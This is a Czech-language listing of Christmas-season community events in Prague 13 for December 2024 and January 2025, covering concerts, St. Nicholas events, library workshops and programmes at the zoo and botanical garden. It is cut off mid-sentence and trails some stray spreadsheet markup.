Pohádkové dopoledne - Vánoce na blátě Divadelní sál FZŠ prof. Otokara Chlupa , Fingerova 2186 Vánoce na blátě - vánoční pohádka o tom, jak Peklo chtělo dětem zkazit Vánoce - hraje soubor divadla Glans. Začátek představení v 10.00, jednotné vstupné 120 Kč (pokladna je otevřena hodinu před začátkem představení). Bližší informace najdete na www.divadloglans.cz. Sobota 7. 12. • 14.00–16.00 Mikulášská stezka Start u hasičárny, Tlumačovská ul. SDH Stodůlky vás srdečně zve na Mikulášskou stezku. Přijďte se se svými dětmi pobavit. Připravena jsou stanoviště s úkoly. Odměny a občerstvení zajištěno. Sobota 7. 12. • 15.00 Mikulášská nadílka Horní hasičárna v Třebonicích Zveme děti a dospělé na příjemné prožití adventu k horní hasičárně v Třebonicích . Pro děti je nachystán bohatý program a nebude chybět ani nadílka od Mikuláše . Více na facebooku našeho sboru - Hasiči Třebonice . Sobota 7. 12. • 15.00 Vánoce s Lučinkou a Radostí KD Mlejn, Kovářova 1615/4 Folklorní soubor Lučinka zve do KD Mlejn na pořad Vánoce s Lučinkou, během kterého se tanečníci i muzikanti spolu s diváky připraví na vánoční čas. Zatančí skupiny od Kominíčků po Sedláky a k tomu všemu zahraje Muzička. Jako hosta přivítáme dětský folklorní soubor Radosť z Trenčína . Přijďte se s námi naladit na vánoční atmosféru plnou českého a slovenského koledování. Více na www.fslucinka.cz. Sobota 7. 12. • 15.00 Mikulášská nadílka Komunitní zahrada Prokopka (ulice Herčíkova, vedle MŠ Úsměv) Spolek Pro kořínky, z.s., vás srdečně zve na Mikulášskou nadílku. V tento den se společně zahřejeme u ohně, povyprávíme si příběhy, zazpíváme koledy a děti si ozdobí perníčky. Společně si také nachystáme něco dobrého na sousedský stůl a děti dostanou balíčky od Mikuláše s andělem. Z kapacitních důvodů je nutná registrace. Registrační formulář naleznete na našich webových stránkách www.zahradaprokopka.cz. Neděle 8. 12. • 18.00 Sousedské Koledování s rozsvícením betlému Centrální park u Kuželkárny Městská část Praha 13 vás srdečně zve na Sousedské Koledování, které bude spojeno se slavnostním rozsvícením betlému. Přijďte si zazpívat nebo se jen zaposlouchat do hlasů svých sousedů, přátel a lidí kolem sebe... Budeme společně zpívat známé vánoční koledy za doprovodu piana a hlasu Mon Akirah Obermajerové, autorky projektu a naší sousedky z Prahy 13. Zpěvníčky s texty koled budou k zapůjčení na místě. S sebou si vezměte teplé oblečení, sváteční náladu a malý hrneček na svařáček, který budeme dávat jako dárek pro každého zpívajícího. Více info na www.HlasDokoran.cz. Úterý 10. – pátek 13. 12. • 9.00–17.00 Vánoční výstava v ZŠ Mohylová ZŠ Mohylová , Mohylová 1963/2 S radostí si vás dovolujeme pozvat na tradiční Vánoční výstavu. Můžete se těšit na vánoční koncert, chvilku poezie a jiná vystoupení, prohlédnout si výrobky dětí, posedět u dobrot ve vánoční kavárně, nakoupit dárky, a to vše v slavnostně nazdobených prostorech naší školy, kde se můžete nechat vtáhnout do vánoční atmosféry a načerpat inspiraci! Školou vás provedou naše děti. Všichni z Mohylky se na vás velmi těší! Úterý 10. 12. • 15.30–18.00 Vánoční jarmark ZŠ Mládí Mládí 135, Praha 13- Stodůlky Srdečně vás zveme na tradiční Vánoční jarmark konaný v prostorách školy. Těšit se můžete na stánky s výrobky jednotlivých tříd, kavárnu i vánoční dílny. Čtvrtek 12. 12. • 8.30–16.00 Den otevřených dveří v ZŠ Mohylová ZŠ Mohylová , Mohylová 1963/2 Den otevřených dveří vám nabízí víc než seznámení se školní budovou. Dorazíte-li v době vyučování, můžete zažít i učitele a žáky v akci a po celý den si můžete popovídat s dětmi ze školy, které vám budou dělat průvodce, a prohlédnout si naši vánoční výzdobu. Těšíme se na vás. Čtvrtek 12. 12. • 16.30–16.50 Vánoční vystoupení studia Mirabel Václavské náměstí , Praha 1 Taneční studio Mirabel zve všechny příznivce, rodiče i milovníky irského tance na Vánoční vystoupení na Staroměstské náměstí . Čtvrtek 12. 12. • 18.00 Vánoční koncert Radnice MČ Praha 13, Sluneční nám. 2580/13 Srdečně vás zveme na vánoční koncert. Zazpívají sbory Klíček a Notečka z FZŠ Mezi Školami. Sobota 14. 12. • 19.00 Vánoční koncert v Ořechu - Robert Křesťan a Druhá tráva Ořech, v sokolovně Na tradičním vánočním koncertě v sokolovně letos vystoupí Robert Křesťan se skupinou Druhá tráva. Přijďte nasát pravou vánoční atmosféru do Ořecha na vystoupení této opravdové hudební legendy, která již získala nejenom prestižní Ceny Anděl, ale v roce 2021 byl Křesťan navíc uveden do Síně slávy české populární hudby. Vstupenky si můžete zakoupit buď on-line na https://www.smsticket.cz/ vstupenky/50322, nebo na obecním úřadě, rezervace na tel. 737 055 600. Neděle 15. 12. – úterý 24. 12. Prodej charitativní vánočky Prodejny Globus Zličín Pekaři a cukráři v Globusu nejen výborně pečou, ale i pomáhají. Pojďte společně s námi přispět na dobrou věc. 25 Kč z každé prodané Máslové vánočky De Luxe 1000g v hypermarketu Globus Praha - Zličín poputuje na podporu činnosti Nadace Leontinka. Děkujeme, že pomáháte s námi! Pondělí 16. 12. • 18.00 Koncert FZUŠ – Melodika Obřadní síň MČ Praha 13, Sluneční nám. 2580/13 Lidový soubor Melodika z Fakultní základní umělecké školy Stodůlky vás srdečně zve na své vystoupení. Středa 18. 12. • 16.30 Klavírní koncert Obřadní síň MČ Praha 13, Sluneční nám. 2580/13 Koncert žáků klavírní školy paní Lyudmyly Shenshyny. Čtvrtek 19. – úterý 24. 12. Prodej vánočních kaprů Hypermarket Globus Zličín , Sárská 133/5 Prodej vánočních kaprů před hypermarketem Globus Zličín . Prodej bude ukončen 24. prosince v 11.00 hodin. Neděle 22. 12. • 14.00–16.00 Ochutnávka tradiční rybí polévky Centrální park Prahy 13 - u Kuželkárny Starosta David Vodrážka a vedení městské části Praha 13 si vás dovolují pozvat na ochutnávku tradiční rybí polévky u Kuželkárny v Centrálním parku. Neděle 24. 12. • 10.00 26. ročník běhu za Ježíškem na Makču Pikču Úpatí haldy Makču Pikču, Centrální park Prahy 13 V roce 1998 naši hokejisté vyhráli Nagano , byl spuštěn vyhledavač Google, ale hlavně vznikla tradice Běhu za Ježíškem. Halda Makču Pikču v Centrálním parku se již pošestadvacáté stane dějištěm tohoto oblíbeného běhu. Tento závod pořádají stodůlečtí atleti a k Vánocům na třináctce neoddělitelně patří. Závodníci se mohou registrovat od 9.30 přímo na úpatí Makču Pikču. Začátek závodu je v 10.00, startovné se neplatí, určeno pro všechny věkové kategorie. Úterý 31. 12. 2024 – 1. 1. 2025 Půlnoční silvestrovsko–novoroční Běh metropole Galerie Butovice , Radlická 117, Praha 5 Se závěrem roku přijde nejen silvestrovská oslava, ale také poslední závod v Evropě v roce 2024. Start je 31. 12. 2024 ve 23.50 hodin. Pokud se chcete stát účastníky tohoto závodu a prožít jedinečnou atmosféru závodu, můžete se přihlásit na http://behmetropole.cz/kalendar-zavodu do 30. 12., kde najdete nejen další podrobnosti a opatření k závodu, ale můžete zhlédnout i videozáznam závodu z let předchozích. Přihlásit se můžete také 31. 12. na místě u prezence. Více na www.behmetropole.cz. Úterý 7. 1. 2025 • 16.00 Z předškoláčka školáčkem ZŠ Janského, Janského 2189 ZŠ Janského připravila školičku, pro všechny budoucí prvňáčky a nulťáčky. Tentokrát na téma Předškolák a abeceda. Prosíme o přihlášení dítěte do školičky na e-mailu: v.ramsova@zs-janskeho.cz. Na všechny se moc těšíme v ZŠ Janského. Další termíny 4. 2. a 4. 3. 2025. Sobota 18. 1. 2025 • 14.00–17.00 Dětský karneval Jinonická sokolovna, Butovická 100/33 Tělocvičná jednota Sokol Jinonice vás a vaše děti srdečně zve na veselý Dětský karneval. Těšit se můžete na bohatý program: tanec, hry a soutěže o ceny. Vstupné dobrovolné. Přezutí s sebou! Více na www.sokoljinonice.cz. Sobota 25. 1. 2025 • 19.30 XXXIII. Sokolský ples Jinonická sokolovna, Butovická 100/33 Výbor tělocvičné jednoty Sokol Jinonice vás srdečně zve na tradiční Sokolský ples. K tanci a poslechu zahraje hudební skupina DOMINO. Bohatá tombola. Vstupné 300 Kč, v předprodeji jen 250 Kč. Předprodej vstupenek on-line od 2. 12. 2024, 12.00 na www.vstupenky.sokoljinonice.cz. Číslo vstupenky odpovídá číslu místa u stolu, zajistěte si proto včas svoje oblíbené místo v předprodeji. Vstup pouze ve společenském obleku. V souladu s platnými zákony je v sále zákaz kouření. Více na www.sokoljinonice.cz. BOTANICKÁ ZAHRADA HL. M. PRAHY Trojská 800/196, Praha 7 – Troja Venkovní expozice je v prosinci otevřena denně 9.00-16.00, skleník Fata Morgana út-ne a svátky 9.00-16.00, vinotéka sv. Kláry po-pá 13.00-16.30, víkend 11.00-16.30. Neděle 14. 1. – 15. 12. • 13.00–15.00 Nedělní sklep - nahlédněte do zákulisí výroby vína Komentované prohlídky vinice a sklepa s malou degustací na závěr. Více na webových stránkách zahrady. Pátek 15. 11. 2024 – 5. 1. 2025 Sedmý šálek čaje Výstav plná vůní a chutí za poznáním cesty čaje. Výstav plná vůní a chutí za poznáním cesty čaje. Co skrývá šálek čaje? Potěšte své smysly a objevte barvu, vůni i chuť nápoje, který změnil svět. Nechte se přenést nejen do Japonska a Číny - cestujte s námi v prostoru i čase. Zjistěte, jak a kde se čajovník pěstuje a sklízí, kdy se čaj dostal do Evropy , co všechno léčí a jak se správně podává a připravuje. Nahlédněte do misky čajového mistra a projděte se čajovou zahradou. Výstava je věnována významné české sinoložce paní Věně Hrdličkové, která by letos na podzim oslavila 100 let a spolupracovala s botanickou zahradou. Pátek 15. 11. – sobota 14. 12. Džungle, která nespí Komentované prohlídky skleníku Fata Morgana po setmění. Naši průvodci pro vás připravili zajímavé putování horami i nížinami, při kterém se vám bude tajit dech. Některé druhy rostlin rozkvétají v noci a omamně voní a celým skleníkem se nese koncertování tropických žabek... Pátek 29. 11. 2024 – neděle 2. 2. 2025 Křišťálová zahrada – Spojení světla a skla ve fantastických instalacích Historicky poprvé se botanická zahrada v zimě rozzáří a rozkvete monumentálními skleněnými instalacemi, které oživí hra světel a hudby. Čekají na vás desítky fantastických instalací s motivy rostlinné a zvířecí říše z dílny uměleckého skláře Jiřího Pačinka . Zahradu můžete navštívit ve dne i večer a prožít tak neopakovatelný zážitek. Přesné časy prohlídek na www.botanicka.cz. Sobota 30. 11. – neděle 1. 12. • 10.00–16.00 Adventní dílničky – Sváteční tvoření pro malé i velké Přijďte se naladit na předvánoční atmosféru a vyzkoušejte si adventní tvoření, které potěší děti i dospělé. Na workshop není potřeba se registrovat. Přijít můžete kdykoliv v čase konání. Více o akcích a novinkách najdete na www.botanicka.cz, info@botanicka.cz, tel. 234 148 111. OC LUŽINY Archeologická 2256/1, Lužiny Neděle 1., 8. a 15. 12. • 11.00 Divadélka OC Lužiny před pobočkou FIO banky 1. 12. Divadlo Úsměv Ludmily Frištenské - Vánoce s pejskem a kočičkou 8. 12. Divadlo ÚSMĚV Ludmily Frištenské - Dva sněhuláci 15. 12. Nezávislé divadlo - Švec a čert 22. a 29. 12. NEHRAJEME Více na www.ocluziny.cz,facebook: OC Luziny. MĚSTSKÁ KNIHOVNA – POBOČKA STODŮLKY Kovářova 1615/4, Praha 13 Pondělky 2., 9. a 16. 12. • 13.00–14.00 Euroklíč Klíč, s jehož pomocí se dostane osoba se zdravotním postižením či rodiče/pěstouni pečující o dítě do 3 let na vybraná bezbariérová WC a plošiny ve veřejných budovách, v metru ve většině států Evropy . Vydává se zdarma na pobočce na základě předchozí domluvy tel. 776 246 938. Úterky 3., 10. a 17. 12. • 10.00–10.45 Pohádkový dědeček, babička - Čtení Máte rádi kouzelné, veselé, napínavé příběhy, pohádky? Chcete zažít krásu mezigeneračního setkání? Stačí přijít, posadit se a zaposlouchat se. Zveme děti ve věku 2-7 let. Středy 4., 11., 18. 12. • 15.30–16.30 Pohádkový dědeček, babička Máte rádi kouzelné, veselé, napínavé příběhy, pohádky? Chcete zažít krásu mezigeneračního setkání? Stačí přijít, posadit se a zaposlouchat se. Můžeme si i něco vyrobit, zahrát hru, společně se pobavit. Zveme děti mladšího školního věku. Středy 4., 11., a 18. 12. • 16.00 Scrabble Všechny zájemce o deskovou hru scrabble zveme na pravidelná hrací odpoledne od 16.00 hod. Neumíte ji, nevadí, tak se ji naučíte. Pobavíte se, procvičíte mozek, a ještě posedíte mezi příjemnými lidmi. Neseďte doma sami a přijďte. Středy 4. a 18. 12. • 16.00–17.30 Deskovky na Stodůlkách Přijďte si zahrát deskové hry do pobočky Stodůlky. Co vás čeká? Široký výběr her, které si mohou zahrát všichni i úplní začátečníci. Můžete přinést i svoji oblíbenou deskovou hru a tu nás naučit. Čtvrtky 5. a 19. 12. • 16.00–19.00 Posezení při kytarách Muzikanti zahrajte sobě a ostatním pro radost. Všichni jste srdečně zváni do pobočky Stodůlky ke společnému hraní. Můžete posedět, zazpívat si i se přidat a zahrát si. Středa 11. 12. • 16.00–18.00 Dílničky pro děti, rodiče, prarodiče - Papíroví andílci Přijďte si vyrobit pro sebe či někomu pro radost papírového andílka. S jeho výrobou vám ráda poradí paní Lenka Veselá. Čtvrtek 12. 12. • 16.00–18.00 Dílničky pro děti, rodiče, prarodiče - Vánoční pozdrav Přijďte si odpočinout do knihovny a vyrobit si vánoční přání pro své blízké. Vstup na akce je volný. Změna programu vyhrazena. Více na www.mlp.cz/stodulky. MĚSTSKÁ KNIHOVNA – POBOČKA LUŽINY Archeologická 2256/1, Praha 13 Pondělí 2. 12. • 15.00–18.00 Workshop - Vánoční ozdoby Přijďte si vyrobit vlastní vánoční ozdoby. Vhodné od 12 let. Úterý 3. 12. • 17.30 Trénování paměti pro seniory Kurz zábavnou formou se zkušenou trenérkou paměti z Právě teď!, o.p.s. Středa 4. 12. • 9.00–19.00 Swap knih Přijďte vyměnit staré knihy za nové a ulovit vánoční dárek pro sebe nebo své blízké. Středy 4., 11., 18. 12. • 11.00 Vycházky s knihovnicí Káčou Pokračujeme ve vycházkách nejen po okolí knihovny. Program jednotlivých vycházek najdete na pobočce a na webu www.mlp.cz/luziny. Čtvrtky 5., 12., 19. 12. • 10.00–12.00 Čtvrteční klub dobré nálady Každý týden dámský klub. Program najdete na pobočce. Čtvrtky 5., 12., 19. 12. • 12.00–13.00 Digitální poradna Pro všechny, kteří potřebují pomoci s mobilem, tabletem nebo počítačem. Čtvrtek 5. 12. • 13.00–18.00 Mikuláš v knihovně Řekněte Mikulášovi básničku, zahrajte si hry s čertem a andělem a vyrobte si něco v mikulšské dílně. Pátek 6. 12. • 17.30 Divadelní představení: Vánoční zastavení – Vzpomínky na Vánoce Členové divadelního spolku Gaudium přicházejí se vzpomínkami na prožité Vánoce. Určeno pro dospělé. Sobota 7. 12. • 10.30 Loutkové divadlo: Půjdem spolu do Betléma Pro děti od 3 let, délka představení je asi 20 minut. Pondělí 9. 12. • 17.30 Koncert skupiny Bety, Nina a Batik boys Skupina zahraje nejen lidové písně z celého světa, ale také Vánoční koledy. Vstupné dobrovolné. Úterý 10. 12. • 16.00 S tebou mě baví svět Klub pro rodiče s dětmi 0-5 let. Úterý 10. 12. • 16.30 Čtenářský klub pro mladé dospělé Neformální setkávání pro čtenáře (nejen) Young Adult ve věku 15–35 let. Úterý 10. 12. • 17.30 Přednáška: Královské Vinohrady Přednáška PhDr. Jindřicha Nolla. Středa 11. 12. • 16.00 Workshop koláže v knihovně Pravidelné setkání milovníků koláží. Pondělí 16. 12. • 15.00–18.00 Workshop: Ozdoby na dárky Přijďte si vyrobit ozdoby na dárky a dárkové tašky. Vhodné od 12 let. Úterý 17. 12. • 16.00–18.30 Bětčina textilní dílna Budou se šít různé textilní sáčky. Materiál zajištěn. Středa 18. 12. • 16.00 a znovu pátek 20. 12. • 10.00 Literární hrátky: Cvičení s říkankou Pravidelný interaktivní pořad pro děti a rodiče. Vstup na akce je volný. Změna programu vyhrazena. Více na www.mlp.cz/luziny. DOMOV SV. KARLA BOROMEJSKÉHO K Šancím 50/6, Praha 17 – Řepy Neděle 1. 12. • 16.30 První adventní koncert Kostel sv. Rodiny Účinkují: Hostivický pěvecký sbor , sbormistryně: Hana Krejčová, klavírní doprovod: Veronika Sivíčková. Na programu: lidové koledy v netradičních úpravách, vánoční písně z českého i světového repertoáru. Neděle 8. 12. • 16.30 Druhý adventní koncert Kostel sv. Rodiny Účinkují: Hornický pěvecký sbor Kladno za doprovodu Temere musicantes, dirigent: Janek Makarius. Na programu: F. X. Thuri - Adventní kantáta, F. X. Brixi - Missa pastoralis. Sobota 14. 12. • 14.00–18.00 Adventní trh v klášteře Atrium domova Čeká na vás vánoční atmosféra, svařené víno , káva... Neděle 15. 12. • 16.30 Třetí adventní koncert Kostel sv. Rodiny Účinkují: Musica Alternativa, violoncello: Nathan Cutler , dirigenti: Jiří Šimáček, Jáchym Chaloupka, vedoucí orchestru a dirigent: Jaroslav Kořán . Na programu: A. Vivaldi, J. S. Bach, A. Corelli, L. van Beethowen, E. Morricone a další. Neděle 22. 12. • 16.30 Čtvrtý adventní koncert Kostel sv. Rodiny Účinkují: Břevnovský chrámový sbor, sbormistr: Lukáš Koudelka. Na programu: J. J. Ryba, Česká mše vánoční. Neděle 5. 1. 2025 • 16.30 J. J. Ryba - Česká mše vánoční Kostel sv. Rodiny Těšíme se na setkání s vámi. Vstupné na koncerty je dobrovolné a je příspěvkem do veřejné sbírky konané na podporu činnosti Domova. Koncerty můžete sledovat i on-line na Youtube @domovsv.karlaboromejskeho9830/streams. Aktuální informace ke koncertům a akcím naleznete na facebooku Domova a našich webových stránkách. Děkujeme vám za podporu a přízeň a přejeme klidné a radostné dny. Více na www.domovrepy.cz. DŮM DĚTÍ A MLÁDEŽE STODŮLKY Chlupova 1800 Pondělí 25. 11. – čtvrtek 12. 12. Letem světem s přáním k narozeninám Akce napříč DDM Stodůlky vede k poznání, jak se slaví narození dítěte a narozenin v různých koutech světa. Ve vstupní hale naleznete v tomto termínu informační brožury a můžete se také zúčastnit výtvarné soutěže. Úterý 3. 12. • 17.00–18.00 První adventní koncert Vstupní hala DDM Stodůlky Prvním adventním koncertem vás pozveme do světa vánočních melodií, které si připravily děti z hudebních kroužků DDM Stodůlky. Přijďte se na konci pracovního dne zaposlouchat do jemných tónů (nejen) vánočních skladeb, které navodí klid a pohodu adventu. Čtvrtek 5. 12. • 15.00–19.30 RvA Čertovské odpoledne Čertíci a čertice už se těší velice, na zlobivé dětičky, na ty malé „hříšníčky”, andělíčci do balíčků přidávají po uhlíčku, Mikuláš vás volá, děti, přijďte si k nám dováděti! Čeká na vás výtvarná dílnička, pro odvážné návštěva nebe a peklíčka, ale především nadílka od hodného Mikuláše a andílka. Registrace nutná, kapacita omezena. Přihlašování startuje 11. 11. 2024 on-line přes klientský účet. Aktivita je podpořena z NDT Obec přátelská rodině a seniorům 2024. Pondělí 9. 12. • 18.30–20.30 Léčivá strava - Strava bez lepku Máte celiakii, alergie, ekzém, zažívací problémy, nadváhu nebo jiné civilizační choroby? Zajímá vás, jakou roli hraje lepek v případě těchto zdravotních obtíží? Přijďte si poslechnout přednášku terapeutky Klinické nutriční medicíny Moniky Novotné a zjistit, co lepek v těle způsobuje a čím ho v jídelníčku nahradit. Úterý 10. 12. • 17.00–18.00 Druhý adventní koncert Vstupní hala DDM Stodůlky Druhý adventní koncert nabídne hudební zážitek v podání našich talentovaných dětí i dospělých. Přijďte si užít adventní večer plný krásných melodií a sváteční nálady. Naši účinkující pro vás připravili rozmanité hudební skladby, které umocní klidnou atmosféru druhého adventního týdne. Těšíme se, že se s vámi podělíme o vánoční kouzlo. Pátek 13. 12. • 10.00–11.30 RvA SmysloHRANÍ - kouzlo Vánoc Zábavné objevování světa pomocí smyslů. Pro vaše děti bude připraveno spoustu aktivit s vánoční tematikou k procvičení jemné motoriky, tipy na smysluplné hračky i oblíbená výtvarná dílnička. Pátek 13. 12. • 18.30–19.30 Vánoční show Belly Amira Spolkový dům , K Vidouli 727, Praha 5 - Stodůlky Zveme vás na vystoupení soutěžních i nesoutěžních kurzů orientálního tance. Soutěžní skupinu Belly Amira, která v minulých letech vybojovala řadu ocenění v ČR i zahraničí, čeká již 12. soutěžní sezona. Těšit se tak můžete na nové soutěžní choreografie, a to jak skupinové, tak i sóla, dua a tria. Zatančí ale také nejmladší tanečnice a začátečnice. Čeká vás pestrá přehlídka různých stylů orientálního tance a Bollywoodu. Pondělí 16. 12. • 17.30 Adventní koncert pěveckých sborů Kostel sv. Klimenta Srdečně vás zveme na adventní koncert plný vánočního kouzla, kde se představí dětský pěvecký sbor Stodůláček a sbor Jistá nejistota. Přijďte si užít předvánoční atmosféru v krásném prostředí kostela sv. Klimenta . Vstupenky za 150 Kč lze zakoupit přes klientský účet DDM Stodůlky. Těšíme se na vás! Pondělí 16. 12. • 19.00–21.00 Přednáška klub RaDka: Umění relaxace i v takovém čase, jako je advent Tento seminář je určen pro všechny, kteří mají chuť se v předvánočním kolotoči na chvilku zastavit, jen tak být a nic nemuset a načerpat sílu. Povíme si, jak si najít čas pro sebe a jak si ho umět prosadit i před svými nejbližšími. Přijďte s námi nastartovat své sebeozdravné mechanismy vašeho těla prostřednictvím různých technik a cvičení. Vstup je volný, ale vaše přihláška závazná a kapacita omezena. Úterý 17. 12. • 17.00–18.00 Třetí adventní koncert Vstupní hala DDM Stodůlky Třetím adventním koncertem vás zveme na hudební cestu plnou vánoční inspirace a různorodých melodií v podání dětí i dospělých z DDM Stodůlky. Čekají vás oblíbené vánoční písně, melodie, které rozehřejí srdce a přenesou vás do kouzelného adventního času. Tento večer bude plný radosti, pohody a příjemné atmosféry. Pátek 20. 12. • 18.00–19.00 Vánoční show Belly Habibi Spolkový dům , K Vidouli 727, Praha 5 -Stodůlky Vánoční orientální show Belly Habibi je přehlídkou soutěžních i nesoutěžních kurzů orientálního tance v DDM Stodůlky. Představí se vám tanečnice ve věku od 4 let, stejně tak jako dětské, dospělácké taneční skupiny Belly Habibi a Belly Habibi Ladies, které si vytančily zlaté medaile na českých i mezinárodních soutěžích. Seznámíte se s rozmanitostí orientálního tance, od klasického tance se závojem přes bubínková sola až k folklórním tancům z Egypta . Můžete se těšit na zajímavé taneční hosty, bubenické číslo a vánoční překvapení. Sředa 25. 12. • 16.00 Zpívání u jesliček Katedrála sv. Víta, Václava a Vojtěcha - Pražský hrad Srdečně vás zveme na Zpívání u jesliček. Účinkují DPS Omikvítek, Dětský katedrální sbor, DPS Stodůláček, Jistá nejistota a Rosanka. Od ledna pro vás opět připravujeme přednášky z cyklu Rodič 21. století, informace najdete na www.ddmstodulky.cz. Přihlášení na akce na www.ddmstodulky.cz přes klientský účet. Více informací na www.ddmstodulky.cz a facebooku. RODINNÉ CENTRUM RYBIČKY Třináctka - křesťanské centrum Luka, Mukařovského 1986 Herna je otevřena po-čt 9.00-12.00. Přihlášení předem není nutné. Cena vstupného na celé dopoledne je 100 Kč. Během dopoledne navíc: 2. 12. a 3. 12. - Mikuláš tak trochu jinak 10. 12. v 10.30 - Zamyšlení kazatele Martina Běle 16.-19. 12. - Vánoční rybičková besídka Pravidelné akce Pondělky a úterky Téma měsíce: Adventní čas - a k tomu připravené říkanky, vyrábění, zpívání, tanečky, divadélka... Středy 9.30 hod. - pohybové okénko pro děti (s doprovodem dospělého) 10.30 hod. - výtvarné tvoření pro děti Čtvrtky 9.30 hod. - hravá angličtina pro děti s Katarínkou 10.30 hod. - výtvarné tvoření pro děti V tomto kalendářním roce bude program v herně naposledy 19. 12. a opět začneme 6. 1. 2025 - Tříkrálovsky. Přejeme vám pokojný advent a mnoho dobrého v novém roce. Více o nás a programu na rc-rybicky.webnode.cz. ŘÍMSKOKATOLICKÁ FARNOST U KOSTELA SV. JAKUBA ST. VE STODŮLKÁCH Kovářova 21, Stodůlky Sobota 30. 11. • 14.00–17.00 Jarmark CMŠ Srdíčko Komunitní centrum sv. Prokopa , V Hůrkách 8 Tradiční jarmark Církevní mateřské školy Srdíčko. Čtvrtek 5. 12. • 17.30 Setkání se sv. Mikulášem Zveme všechny děti do Komunitního centra sv. Prokopa na setkání se sv. Mikulášem , který dorazí v doprovodu laskavých andělů. Prosíme o předběžné přihlášení na webu farnosti. Úterý 17. 12. • 16.00 a 18.00 Varhanní adventní koncerty v kostele sv. Jakuba Účinkující: Ondřej Valenta - varhany, Ludmila Pavlová housle, Lucie Silkenová - soprán. Cena: 250 Kč / 200 Kč (studenti do 26 let, senioři 65+) / 100 Kč (děti 6-15 let, ZTP) / zdarma děti 0-6 let Úterý 24. 12. Kostely otevřené pro modlitbu, prohlídku betléma Bude možnost odnést si do domácnosti Betlémské světlo. • 15.00-17.00 hod. - Kostel sv. Jakuba St . • 13.00-15.00 hod. - Kostel sv. Prokopa Středa 25. 12. • 17.00 Koncert J. J. Ryba: Česká mše vánoční Kostel sv. Jakuba St . Účinkuje Stodůlecký chrámový pěvecký sbor s hosty a orchestrem. Řídí Jiří Kubík. Vstupné dobrovolné. Středa 25. a čtvrtek 26. 12. Otevřeno pro modlitbu a prohlídku betléma • 13.00-16.00 - Kostel sv. Jakuba a kostel sv. Prokopa Více informací a další akce na www.farnoststodulky.cz. TŘINÁCTKA – KŘESŤANSKÉ CENTRUM LUKA Mukařovského 1986, (zastávka metra Luka) Neděle 1. 12. • 9.00 a 11.00, 1. adventní bohoslužba Úterý 3. 12. • 18.30–20.00 Promítaní seriálu The chosen Pokračujeme ve večerech Objevujeme křesťanství. Promíteme díly seriálu The chosen, který je teď po světě velkým hitem. Po zhlédnutí si ještě chvíli budeme povídat ve skupinkách o dobovém pozadí a otázkách, které v nás příběh vyvolal. Všichni jsou zváni, registrace není nutná. Neděle 8. 12. • 9.00 a v 11.00 2. adventní bohoslužba Neděle 15. 12. • 10.00 Dětská vánoční slavnost Kd Mlejn, Kovářova 1615/4 Neděle 22. 12. • 9.00 a 11.00 4. adventní bohoslužba Neděle 29. 12. • 10.00 Poslední bohoslužba v roce 2024 Pondělky • 16.30–18.00 Dětský klub Savana Pravidelné schůzky našeho křesťanského klubu pro děti od 6 do 10 let (po první třídě ZŠ). Další info na www.klubsavana.webnode.cz. Středy • 18.30–20.30 Setkání klubu „Mládež” Jsme otevřenou skupinou ve věku zhruba 16-23 roků. Více na www.facebook.com/mladez13. Pátky • 16.00–18.30 Klub Robinson Outdoorový klub pro děti a mládež ve věku 10-15 let. Více na www.klubrobinson.cz. Neděle • 9.00–10.15; 11.00–12.15 Nedělní bohoslužby Otevřená setkání, kde může každý příchozí slyšet to, co je pro nás nejdůležitější – dobrou zprávu (evangelium) o tom, že Ježíš Kristus přichází za člověkem. Zároveň hledáme, jak zvěst Bible promlouvá do naší každodenní reality, se kterou každý člověk zápasí. Součástí bohoslužeb je i program pro děti. První bohoslužbu lze sledovat živě na www.13ka.cz/stream. Informace o dalších aktivitách na www.13ka.cz. ZOOLOGICKÁ ZAHRADA HL. M. PRAHY U Trojského zámku 120/3, Praha 7 V prosinci je otevírací doba od 9.00 do 16.00. Pokladny zavírají půl hodiny před koncem otevírací doby. Světelná zoo: V dolní části areálu Zoo Praha září více než sto lampionů v podobě divokých afrických zvířat. Několik z nich vyrobila firma Garden of Lights přímo pro Zoo Praha . Světelná zoo návštěvníkům po setmění nabízí i posvátný baobab nebo interaktivní projekce. Lidé se mohou těšit také na fotopointy a další tisíce světel, které rozsvěcí pražskou zoo. Výstavy: Galerie Gočárovy domy : Freighted Jurta: 65 let plemenné knihy koně Převalského Terasa před Vzdělávacím centrem: Návrat divokých koní do Kazachstánu Neděle 1. 12. Advent začíná Zúčastněte se slavnostního rozsvícení vánočního stromu a užijte si bohatý program plný vánoční atmosféry. Adventní dílny Vyrobte si vlastní adventní věnec. Rezervace a více info na www.zoopraha.cz. V den akce je možné rezervovat případná volná místa pouze na Informačním centru u hlavního vchodu. Slavností rozsvícení vánočního stromu • 17.15 Od 15.30 do 16.30 bude možné zakoupit si zvýhodněnou vstupenku do zoo za 50 Kč*. Užijte si s rodinou tu pravou vánoční atmosféru. *Na zvýhodněné vstupné se nevztahují žádné další slevy. Vstupenka se vztahuje pouze na slavnostní program rozsvícení vánočního stromu. Čtvrtek 5. 12. Mikuláš v zoo Do Zoo Praha zavítají Mikuláš , čert a anděl! Posvítí si na hříšníky a ty nejhodnější odmění Mikuláš s andělem malým dárkem. Sobota 7. 12. • 11.00–14.00 Tradiční setkání sponzorů Zveme všechny sponzory a adoptivní rodiče k nám do zoo! Užijte si jedinečný program, který je věnován přímo vám. Neděle 8. 12. Zooškola pro děti na téma Krmení je věda Víte, jak správně krmit varany? Nebo kolik kilogramů mrkve se v zoo denně spotřebuje? Na této zooškole se dozvíte, čím vším se mohou zvířata v zoo krmit a jak nesnadné je vyhovět potravním specialistům. Sobota 14. 12. Oslava narozenin Moji Oslavte s námi dvacáté narozeniny gorilí samice Moji, prvního gorilího mláděte narozeného v rámci českých zoologických zahrad. Moja sice žije v současnosti ve Španělsku , její potomky však nyní můžete vidět v Rezervaci Dja! Duni, Mojinu dceru, a Mobi, Mojinu vnučku. Neděle 15. 12. Zooškola pro dospělé na téma Zbavte se fobií Mnoho z nás trpí v dospělosti iracionálním stra</t>
  </si>
  <si>
    <t>20241201_348_3473481105_f0d59afaedfa2db7e596.html</t>
  </si>
  <si>
    <t>f0d59afaedfa2db7e596</t>
  </si>
  <si>
    <t>Harmonogram svozu odpadu 2025 – rodinné domy</t>
  </si>
  <si>
